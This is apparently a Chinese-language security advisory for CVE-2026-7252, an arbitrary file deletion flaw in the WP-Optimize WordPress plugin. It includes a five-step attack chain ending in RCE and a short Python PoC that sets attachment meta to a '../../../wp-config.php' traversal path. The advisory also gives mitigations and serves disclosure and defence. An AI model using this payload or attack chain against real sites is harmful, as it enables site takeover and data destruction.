IPBUF安全漏洞报告
English
CVE-2026-7252 CVSS 8.1 高危

CVE-2026-7252 WP-Optimize任意文件删除漏洞

披露日期: 2026-05-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7252
漏洞类型
任意文件删除
CVSS评分
8.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
WP-Optimize Plugin for WordPress

相关标签

WordPressWP-Optimize任意文件删除权限绕过远程代码执行CVE-2026-7252

漏洞概述

WP-Optimize WordPress 插件 4.5.2 及以下版本存在任意文件删除漏洞。由于 `unscheduled_original_file_deletion` 函数未对文件路径进行充分验证,且 'original-file' 元键因缺少下划线前缀而允许作者级别用户修改,攻击者可利用此缺陷删除服务器上的任意文件(如 wp-config.php)。该漏洞可被用于破坏网站完整性,并极易结合其他步骤导致远程代码执行,对系统安全构成严重威胁。

技术细节

该漏洞的核心在于 WordPress 的元数据保护机制与插件逻辑的冲突。WordPress 规定以 `_` 开头的元键为受保护键,仅限特定权限修改,而 'original-file' 未遵循此约定。低权限用户(作者)可通过 REST API 或后台编辑界面修改附件的 'original-file' 元数据值为任意路径(如 `../../wp-config.php`)。当插件执行清理或图片优化操作时,`unscheduled_original_file_deletion` 函数会直接读取该元数据并调用文件删除函数,未进行安全校验。通过删除关键配置文件,攻击者可强制 WordPress 进入安装模式,从而获取数据库连接信息或接管网站,实现远程代码执行。

攻击链分析

STEP 1
1. 获取权限
攻击者注册或入侵一个具有作者及以上权限的 WordPress 账号。
STEP 2
2. 寻找附件
在媒体库中找到一个现有的附件,或者上传一个新的图片文件。
STEP 3
3. 修改元数据
通过 REST API 或编辑界面,修改该附件的 'original-file' 元数据值为目标敏感文件路径(如 ../../wp-config.php)。
STEP 4
4. 触发删除
等待插件的后台任务执行,或手动触发清理/优化操作,调用 `unscheduled_original_file_deletion` 函数。
STEP 5
5. 文件删除与 RCE
服务器执行删除操作,wp-config.php 被移除。攻击者访问网站触发重新安装流程,写入恶意代码实现 RCE。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC Concept: Modify 'original-file' meta to delete wp-config.php import requests # Configuration target_url = 'https://example.com' username = 'author' password = 'password' attachment_id = 123 # ID of an existing attachment # 1. Authenticate session = requests.Session() login_data = {'log': username, 'pwd': password, 'redirect_to': target_url + '/wp-admin/'} session.post(target_url + '/wp-login.php', data=login_data) # 2. Update 'original-file' meta to target wp-config.php api_url = f'{target_url}/wp-json/wp/v2/media/{attachment_id}' headers = {'X-WP-Nonce': 'get_nonce_from_api'} # Need to fetch nonce first payload = { 'meta': { 'original-file': '../../../wp-config.php' } } # response = session.post(api_url, json=payload, headers=headers) # print(f"Status: {response.status_code}")

影响范围

WP-Optimize <= 4.5.2

防御指南

临时缓解措施
在未升级插件前,建议暂时禁用 WP-Optimize 插件以阻断攻击路径。同时,应严格审核注册用户权限,避免开放作者级别权限给不可信用户。管理员可定期备份核心文件(如 wp-config.php),以便在遭受攻击后快速恢复。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表